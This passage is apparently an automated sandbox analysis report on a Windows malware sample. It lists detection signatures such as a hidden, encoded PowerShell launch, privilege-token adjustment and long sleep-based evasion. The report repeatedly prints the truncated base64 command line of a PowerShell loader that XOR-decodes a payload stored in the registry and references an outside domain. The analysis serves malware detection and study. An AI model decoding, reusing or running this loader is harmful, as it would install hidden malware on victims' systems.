AgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CACEE AdjustTokenPrivileges,3_2_003CACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CACB7 AdjustTokenPrivileges,3_2_003CACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: powershell.exe, 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkA